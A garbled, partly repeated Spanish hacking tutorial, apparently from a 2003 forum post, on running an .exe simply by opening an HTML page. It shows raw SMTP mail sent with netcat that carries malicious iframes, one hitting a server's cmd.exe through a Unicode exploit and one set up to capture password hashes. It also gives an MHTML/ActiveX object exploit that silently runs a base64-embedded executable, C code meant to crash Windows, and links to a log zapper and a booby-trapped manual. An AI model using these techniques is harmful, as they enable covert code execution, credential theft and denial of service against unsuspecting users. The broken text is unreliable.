COMO Ejecutando .EXE Desde HTML by Diego Arenas)

En fin con esto terminareacute mi aventura con HTML

Muy importante seraacute que hayaacuteis comprendido el contenido de los postanteriores sobre HTML especialmente el de La importancia de llamarseHTML eacuteste es el link para los que no lo vieron

httpwwwhackxcrackcomphpBB2viewtopicphpt=5634

En esta ocasioacuten vamos a realizar dos praacutecticas con varios ejemplos cadauna

1ordf) Enviar por mail las webs maliciosas vistas en los post anterioresconcretamente las del robo de contrasentildeas y UNICODE

2ordf) Crearemos un archivo HTML con un exe incrustado MIME queejecutaraacute LO QUE NOS DE LA GANA con tan soacutelo visitar la web

Todo ello de forma trnsparente al desconfiado visitante con sigilo sinecesidad de que intervenga por el mero hecho de abrir un inofensivoarchivo HTML

CORREO 1

Nos crearemos un archivo de texto con el siguiente contenido

Coacutedigohelo localhost mail from origenqueATACOcom rcpt to destinopobreMiguelitocom data Subject Probando probando 1-2 1-2 Mime-Version 10 Content-Type texthtml

ltBODY BGCOLOR=black TEXT=yellow SCROLL=yesgt ltimg src=imgthorjpggt ltbgtHOLA CHICS ESTAIS PREPARADOSltbgt ltbrgtltbrgt ltiframe src=httpwwwterraes height=200 width=300scrolling=nogt ltiframegt ltiframe src=http8036230235scriptscmdexec+dir+cheight=200 width=300gtltiframegt ltBRgtltBRgt En el Frame de la izquierda veraacutes la web de terra a tamantildeo200 x 300 sin barras de desplazamiento ltbrgt En el Frame de la derecha estaraacutes viendo el directorio cdel server de pruebas de HxC ltBODYgt quit

Descargado de wwwDragonJARus Google =gt La WeB de DragoN

Si comprobaacuteis el coacutedigo con los otros posteados anteriormente vereacuteisque es ideacutentico lo uacutenico que se incluye nuevo son las cabeceras del maily las liacuteneas Mime-Version y Content-Type

Destacar que no ha sido preciso las marcas de inicio y final del coacutedigoltHTMLgt y ltHTMLgt puesto que eso mismo ya se lo indicamos en laetiqueta Content-Type texthtml

Como es obvio debeacuteis cambiar las direcciones de MAIL FROM y de RCPTTO por las que correspondan para probar ya lo sabeacuteis las vuestrasluego las de otros

La imagen de mi avatar no saldraacute puesto que no se ha incrustado en elmail por razones de espacio tan soacutelo existe la referencia no la imagenen siacute misma por ello en eacutesta y otras praacutecticas os saldraacute el cuadradito dela imagen pero sin su contenido graacutefico

Coacutemo se enviacutea esto

Pues una vez guardado en un txt por ejemplo AprendiendoCorreotxty lo guardamos en el mismo directorio doacutende tengamos el netcat hayque ver lo que da de siacute el nc entonces escribimos

Type AprendiendoCorreotxt|nc -vv -w 3 servidor_de_correo 25

Y se enviacutea

Cuando el destinatario lo reciba si lo abre con Outlook se comportaraacutecomo si se tratase de una web es decir se ejecutaraacuten los famososiframe

CORREO 2

Coacutedigo


echo localhost mail from origenqueATACOcom rcpt to destinopobreMiguelitocom data Subject Probando probando 1-2 1-2 Mime-Version 10 Content-Type texthtml

ltHEADgtltHEADgt ltBODY BGCOLOR=black TEXT=yellow SCROLL=yesgt ltimg src=imgthorjpggt ltbgtHOLA CHICS ESTAIS PREPARADOSltbgt ltbrgtltbrgt ltiframe src=httpwwwterraes height=300 width=600scrolling=yesgt ltiframegt ltiframe src=file17228130254kekosasnulgif height=1width=1 scrolling=nogt ltiframegt ltBODYgt quit

Eacuteste lo trataacuteis de igual modo que el anterior lo meteacuteis en un txt pe(RobandoCorreotxt) se cambian los remitentes y destinatarios y seenviacutea con el netcat como antes cuando lo reciba con Outlook sitenemos el esnifer preparado podremos robarle la contrasentildea como yase ha explicado

Quizaacutes llame la atencioacuten el paraacutemetro -w 3 que se puso en el netcatesto desconectaraacute a nuestro nc pasados 3 segundos lo ponemos asiacutepara que deacute por finalizado el enviacuteo y de algo de tiempo al servidor decorreo para tragarse el mail

EXEs incrustados y LISTOS para ejecutarse

Hay muchas formas de hacerlo yo voy a exponer una de ellas elobjetivo es disponer de un fichero html que soacutelo por visualizarlo ejecuteel archivo que queramos

El archivo no tiene por queacute existir en la viacutectima de hecho si existieraseriacutea mucho maacutes faacutecil

He elegido un archivo inofensivo para el ejercicio se trata de unvisualizador-editor de cookies que por otra parte a maacutes de uno levendraacute bien

Cuando ejecuteacuteis el archivo vlocalhtml arrancaraacute la paacutegina de googley EJECUTARA el archivo de las cookies podriacutea haber sido otra cosa un


troyanito un bouncer un virus un keylogger un exploit o un DoS

Al final de eacuteste doc tendreacuteis un link de descarga con varios ejemploshe puesto uno con el que podreacuteis reiniciar cualquier windows jeje y soacutelopor visitar nuestra web le apagamos-reiniciamos el equipo a un pollo

AVISO no quiero que nadie piense mal bah apagar un PC eso es delammers Si la causa es justa no viene mal tenerlo a mano porejemplo situaciones en las que procede (una comprometida y otra deaviso)

1- Despueacutes de la instalacioacuten de un troyano o similar que precisereiniciar windows

2- Imaginad que descubris a un extra-mega-super h4cx0r-divino-de-la-muerte que estaacute accediendo a vuestro web server probando unicodesexploits etc pues con eacuteste programita incluido en un html podemosincitarle y dirigir su sesioacuten de navegacioacuten hacia el html malicioso ycuando el tiacuteo llega a la paacutegina ZAS Su pc se apaga

Bueno a lo que vamos lo primero el coacutedigo del archivo html luego laexplicacioacuten

Coacutedigo


MIME-Version 10 Content-Locationfilevic_thorexe Content-Transfer-Encoding base64

TVqQAAMAAAAEAAAA8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVG AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

lttitlegtVic_Thorlttitlegt ltbody bgcolor=black scroll=nogt ltSCRIPTgt function malicialocal() var s=documentURL var path=unescape(ssubstr(-0slastIndexOf())) var formato= ltbody scroll=no bgcolor=blackgtltFONT face=Arialcolor=orangegt var imagen= ltimg src=imgthorjpggt var texto = ltbgt PREPARADOS Os presento el mejor buscador queEXISTEltbgtltbrgt var iframe1=ltiframe src=httpwwwgooglecom height=300width=750gtltiframegt var iframe2=ltiframe src=file17228130254kekosasnulgifheight=1 width=1gtltiframegt var objetoini=ltobject classid=clsid66666666-6666-6666-6666CODEBASE=mhtml var objetofin=Vlocalhtmlfilevic_thorexegtltobjectgt var bugg = objetoini+path+objetofin documentwrite (formato+imagen+texto+iframe1+iframe2+bugg) setTimeout(malicialocal()200) ltscriptgt

El coacutedigo de arriba combina el robo de contrasentildeas con la ejecucioacuten deun programa de nuestra eleccioacuten REPITO no debeacuteis preocuparos porla autoejecucioacuten del coacutedigo es inofensivo es maacutes os vendraacute hasta bienpara conocer vuestras cookies y lo dicho podriacutea haber sido algo malo

He asignado el coacutedigo en variables de eacutesta forma podreacuteis usarlo enotras funciones-scripts etc Con muy pocos cambios ahora vamos aexplicar todo este rollo

CoacutedigoMIME-Version 10 Content-Locationfilevic_thorexe Content-Transfer-Encoding base64

Incrusta el exe dentro del html convertido al formato Base64 (recordad


el post de los decoders)

Las dos liacuteneas bajo MIME indican coacutemo se llamaraacute el archivo codificado(vic_thorexe) y el formato (base64)

A continuacioacuten tenemos un chorizo laaaargiiiiiisiiiiimoooooo designos eso es el archivo exe codificado en Base64 por motivos queentendereacuteis soacutelo he puesto un extracto

CoacutedigolttitlegtVic_Thorlttitlegt ltbody bgcolor=black scroll=nogt

Aquiacute termina el archivo codificado damos un tiacutetulo al documento yelegimos un color negro y sin barras de desplazamiento

Lo del negro tiene su explicacioacuten si no lo ponemos el chorizo deBase64 se veraacute cuando se ejecute y eso no es bueno la teacutecnica maacutessencilla para que no se vea consiste en poner el mismo color de fondoque de texto como la fuente va en negro pues no se veraacute (texto ennegro y fondo negro) en otros ejemplos lo encerreacute entre lt-- y --gttambieacuten funciona ya os dareacuteis cuenta cuando lo ejecuteacuteis

CoacutedigoltSCRIPTgt function malicialocal()

Bueno esto tambieacuten es sencillo se inidca que vamos a usar un script ydeclaramos una funcioacuten llamada maliciosalocal que no aceptaargumentos o paraacutemetros ni devuelve resultados pareacutentesis vaciacuteos ()

A partir de aquiacute se definen e inicializan una serie de variables de cadenao de string o alfanumeacutericas o como las queraacuteis llamar las ireacuteexplicando

Coacutedigovar s=documentURL var path=unescape(ssubstr(-0slastIndexOf()))

La variable s guardaraacute la direccioacuten web del archivo html peDmaliciavlocalhtml o la ruta completa doacutende resida el archivo

La variable path se queda uacutenicamente con la ruta siguiendo con elejemplo seriacutea Dmalicia la funcioacuten substr extrae de la variable s

Descargado de wwwDragonJARus com La WeB de DragoNDescargado de wwwDragonJARus Google =gt La WeB de DragoN

todos los caracteres desde el primero de la izquierda hasta la uacuteltimabarra ()

A la funcioacuten lastIndexOf se le ponen dos barras porque en JS HTMLetc No se puede representar el signo por siacute soacutelo vamos que siqueremos poner una barra () para que el navegador lo entienda sedeben poner dos y no solo una se trata de un problema sintaacutectico noporque existan realmente dos barras en la direccioacuten web que guarda lavariable s

Coacutedigovar formato= ltbody scroll=no bgcolor=blackgtltFONTface=Arial color=orangegt var imagen= ltimg src=imgthorjpggt var texto = ltbgt PREPARADOS Os presento el mejorbuscador que EXISTEltbgtltbrgt var iframe1=ltiframe src=httpwwwgooglecom height=300width=750gtltiframegt var iframe2=ltiframesrc=file17228130254kekosasnulgif height=1width=1gtltiframegt

Todas eacutestas variables guardan el contenido que el visitante veraacuteobservad que es muy parecido al coacutedigo HTML de los ejemplos de correoanteriores soacutelo que metido en variables para luego utilizarlas

Formato es la variable que guarda el aspecto de la paacutegina color defondo tipo y color del texto Imagen la variable que contiene el link o lugar donde esteacute guardad laimagen Texto es la variable que contiene el texto que se visualizaraacute al cargar lapaacutegina Iframe1 e iframe2 son las variables que definen los marcos a usaruno con la paacutegina de google y otro con el acceso a un fichero que noexiste para robar la contrasentildea si tenemos el esnifer preparado en esadireccioacuten todo esto ya se explicoacute en los post anteriores de HTML

Destacar tambieacuten el uso de comillas simples () para agrupar lasexpresiones que a su vez utilizan comillas dobles () de eacuteste modo nose producen errores y el navegador interpreta correctamente el principioy el final de la serie de caracteres

Coacutedigovar objetoini=ltobject classid=clsid66666666-6666-6666-6666CODEBASE=mhtml var objetofin=Vlocalhtmlfilevic_thorexegtltobjectgt var bugg = objetoini+path+objetofin


Bueno bueno Esto es el bug en siacute mismo si lo hubieacutesemos escrito todoseguido seriacutea

ltobject classid=clsid66666666-6666-6666-6666

CODEBASE=mhtml+path+Vlocalhtmlfilevic_thorexegtltobjectgt

Para decirlo de un modo sencillo utiliza un control ActiveX y lo asocia anuestro fichero codificado en Base64 como formato mhtml (MimeHTML)si traducimos por el contenido de las variables seriacutea algo asiacute

mhtmlDmaliciaVlocalhtmlfilevic_thorexe

Vuelvo a insistir en el uso de barras repetidas dos barras equivalen auna tres barras equivalen a dos etc de forma que si hubieacutesemosescrito eso mismo directamente en la barra de direccioacuten seriacutea


El resultado de nuestro navegador es que cuando llegue el momento devisualizar el html ademaacutes de la web se ejecutaraacute el fichero vic_thorexeincrustado en formato mime dentro del archivo html situado endmaliciavlocalhtml

El archivo vic_thorexe realmente es [color=limeiecvexe [color]quepermite ver las cookies almacenadas en nuestro pc es como si lohubieacutesemos renombrado

Por uacuteltimo tenemos

Coacutedigodocumentwrite(formato+imagen+texto+iframe1+iframe2+bugg) setTimeout(malicialocal()200) ltscriptgt

documentwrite escribiraacute en el documento el contenido de lasvariables que se indican entre pareacutentesis esas variables contienen elaspecto y contenidos como ya se explicoacute anteriormente

La llave cerrada () marca el final de la funcioacuten malicialocal() declaradaal principio

SetTiemout llama a la funcioacuten malicialocal() pasados 200milisegundos este intervalo se puede variar si ponemos 5000 puesaproximadamente tardaraacute 5 segundos en mostrar la paacutegina etc

Es recomendable poner un tiempo de espera para que el navegador


cargue el script del todo por eso 200 milisegundos valores a partir deese nuacutemero funcionaraacuten tambieacuten sin problemas

Todos los nombres son ficticios no tienen porqueacute ser esos al igual quelos directorios lo uacutenico que no debeacuteis hacer es cambiar de nombre alarchivo vlocalhtml porque sino no os funcionaraacute bueno siacute lo haraacute siademaacutes del nombre fiacutesico del archivo se lo cambiaacuteis al contenido de lavariable cuando empeceacuteis a trastear con ello lo entendereacuteis mejor

Coacutemo podemos manipular el script para que funcione con otrosficheros yo paacuteginas

1ordm) Se debe convertir el exe que deseamos ejecutar a Base64 y pegarsu contenido en lugar del que hay

2ordm) podemos mantener como nombre vic_thorexe si quisieacuteramoscambiarlo por ejemplo a progexe debemos cambiar eacutestas liacuteneas

CoacutedigoContent-Locationfilevic_thorexe

por

Content-Locationfileprogexe

Y tambieacuten debemos cambiar

Coacutedigovar objetofin=Vlocalhtmlfilevic_thorexegtltobjectgt

por eacutesta otra

var objetofin=Vlocalhtmlfileprogexegtltobjectgt

3ordm) Podemos cambiar el nombre del archivo vlocalhtml por otrodiferente por ejemplo por indexhtml para ello se deben cambiar eacutestasliacutenea


por eacutesta otra

var objetofin=indexhtmlfilevic_thorexegtltobjectgt

Os recuerdo que si modificamos el nombre del exe tambieacuten seraacutenecesario cambiar en eacutesta misma liacutenea vic_thorexe por el nombre


nuevo como se explicoacute en el punto 2

Como veacuteis es bastante uacutetil disponer del contenido en variables de esemodo otros programas o scripts las pueden variar a nuestro antojo eincluir eacutesta funcioacuten (malicialocal()) a modo de libreriacutea que esos otrosprogramas llamen y la ejecuten

La versioacuten del coacutedigo que he tratado soacutelo seraacute efectiva si el archivohtml se ejecuta desde el equipo local no lo podeacuteis colocar directamenteen un web server para que se lance de forma remota para hacer estouacuteltimo hay que modificar un poquito el contenido y tener suerte ademaacutesmuchos servidores gratuitos utilizan frames y otros coacutedigos que nos lofastidiaraacuten pero eso no impide montarnos nuestro propio servidor web ycolocarlo alliacute

Al final del documento teneacuteis una versioacuten modificada para colgardirectamente en la Web el problema seraacute que los navegadores actualessuelen tener desactivado la ejecucioacuten de secuencias de coacutedigo ActiveX yno funcionaraacute del todo digo del todo porque para la proacuteximaintentaremos cuanto menos que se guarde el archivo localmenteaunque no se pueda ejecutar de forma que si coneguimos robarle lacontrasentildea como ya se ha explicado hasta la saciedad podremosconectarnos al equipo remoto y ejecutarle el archivito

EXPLOIT para matar a windows

Para finalizar si una vez ejecutado el coacutedigo malicioso es preceptivo unreinicio para que los cambios tomen efecto vamos a crear un exploitque lo hace es sumamente simple y el su descubrimiento fue casual pormi parte probando otras cositas lo descubriacute aunque al final comosiempre pasa existen otros mentes calenturientas que llegaron a lamisma conclusioacuten

Para ello vamos a necesitar un compilador de C y el coacutedigo loacutegico

El programa en C seriacutea eacuteste

Coacutedigoinclude ltstdiohgt int main(void) while (1) printf(ttbbbbbb) return 0

Siacute asiacute de sencillito esto provocaraacute un desbordamiento de buffer delservicio CSRSSexe que bloquearaacute windows y lo reiniciaraacute


Es un bucle infinito que enviacutea a pantalla tabulaciones y retrocesosconsecutivos cuando son excesivos Windows se bloquea y reinicia

Lo compilais con Dev++ o con Vc++ y a funcionar cuando se ejecutaWindows se paraliza y se muere

Para meterlo dentro de nuestro html malicioso bastariacutea contransformarlo a Base64 y pegarlo en lugar de los que hay cuandovisualiceacuteis el archivo vlocalhtml o como se llame windows se reinicia

Todos los coacutedigos fuentes y ejemplos los teneacuteis aquiacute

Praacutecticas de enviacuteo de correo

httpwwwiespanaesFTPVicThormalawebCorreoFuenteszip

Ejecucioacuten MIME del archivo vercookies

httpwwwiespanaesFTPVicThormalawebVerCookieszip

Ejecucioacuten MIME del borrado de logs

Esta versioacuten la podeacuteis colocar directamente en un servidor web yfuncionaraacute remotamente con alguna restriccioacuten que respondereacute a ellasen el Foro a medida que se os vayan produciendo

httpwwwiespanaesFTPVicThormalawebLogsForWebzip

Ejecucioacuten MIME para reiniciar Windows

OJO QUE CUANDO LO EJECUTEIS WINDOWS SE MUEREEEEE

httpwwwiespanaesFTPVicThormalawebAdiosWinzip

Ejecucioacuten MIME con algo de Ingenieriacutea Social

En eacuteste ejemplo un incauto visitante de la web se descarga un manualque le interesa o se lo hemos enviado por mail se trata de un manualdel netcat cuando lo visualiza en su equipo para imprimirlo o leerlo sele ejecutaraacute tambieacuten el coacutedigo malicioso

NO PREOCUPAROS lo que se os va a ejecutar cuando lo hagaacuteis seraacuteun escaneador de servidores vulnerables a REDCODE vamos que no esnada raro ni os estoy colocando un virus ni otras cosas que hubiesepodido eso siacute soacutelo hay unos 10 segundos para leerlo vaaale dejareacuteque lo podaacuteis ver y no modificareacute el script para que lo elimine seguroque a maacutes de uno le viene bien el manual de netcat


httpwwwiespanaesFTPVicThormalawebmanualNCzip

Coacutedigos ejecutables (exe)

Del zapper que borra logs vercookies tirar a windows el decoder paraconvertir exe a Base64 y el escaneador de REDCODE

httpwwwiespanaesFTPVicThormalawebArchivosEXEzip

Bueno hay maacutes formas existe otras ejecuciones CODEBASE el bug delwav-exe y muchas otras que permiten inyectar archivos exe enarchivos html que se ejecutan al visualizarlos recibirlos por correo osimplemente por situar el cursor sobre ellos

Que aproveche y SALUD a todos

PD No seacute si lo vereacuteis interesante pero pienso que la proacutexima deberiacuteaser el aprender coacutemo defendernos de todo esto configurar bien elequipo detectar mails maliciosos evitar la ejecucioacuten de coacutedigo etciquestQueacute os parece

--- AMPLIADO HOY JUEVES 22 DE MAYO DE 2003 ----

Antes de que ocurriese la peacuterdida inesperada de eacuteste y otros post en eldiacutea de ayer creo recordar que alguno de vosotros no le funcionaba deltodo

Microsoft sacoacute un parche (que no he probado) para evitar eacuteste asunto el23 de abril de 2003 antes de esa fecha eacuteste coacutedigo ya circulaba entrealguno de nosotros y funcionaba OK seguacuten los privados que meenviaron los que hayaacuteis actualizado los hotfix recientemente esprobable que no os funcionen el caso es que con hotfix o sin ellosPROBADLO EN LOCAL para colgarlo de un webserver hay que tocaralgunas cosas en el ejemplo de VicForWeb estaacute el coacutedigo modificadopara la web pero no siempre funcionaraacute dependeraacute mucho del Websitey de la configuracioacuten del navegador del visitante

parchehttpwwwmicrosoftcomtechnettreeviewurl=technetsecuritybulletinMS03-014asp_________________-lt|middotthorn


Si comprobaacuteis el coacutedigo con los otros posteados anteriormente vereacuteisque es ideacutentico lo uacutenico que se incluye nuevo son las cabeceras del maily las liacuteneas Mime-Version y Content-Type

Destacar que no ha sido preciso las marcas de inicio y final del coacutedigoltHTMLgt y ltHTMLgt puesto que eso mismo ya se lo indicamos en laetiqueta Content-Type texthtml

Como es obvio debeacuteis cambiar las direcciones de MAIL FROM y de RCPTTO por las que correspondan para probar ya lo sabeacuteis las vuestrasluego las de otros

La imagen de mi avatar no saldraacute puesto que no se ha incrustado en elmail por razones de espacio tan soacutelo existe la referencia no la imagenen siacute misma por ello en eacutesta y otras praacutecticas os saldraacute el cuadradito dela imagen pero sin su contenido graacutefico

Coacutemo se enviacutea esto

Pues una vez guardado en un txt por ejemplo AprendiendoCorreotxty lo guardamos en el mismo directorio doacutende tengamos el netcat hayque ver lo que da de siacute el nc entonces escribimos

Type AprendiendoCorreotxt|nc -vv -w 3 servidor_de_correo 25

Y se enviacutea

Cuando el destinatario lo reciba si lo abre con Outlook se comportaraacutecomo si se tratase de una web es decir se ejecutaraacuten los famososiframe

CORREO 2

Coacutedigo


















Coacutedigo





















































por




por eacutesta otra




por eacutesta otra





























































Coacutedigo





















































por




por eacutesta otra




por eacutesta otra
































































































por




por eacutesta otra




por eacutesta otra













































COMO Ejecutando .EXE Desde HTML by Diego Arenas)

Documents

Transcript of COMO Ejecutando .EXE Desde HTML by Diego Arenas)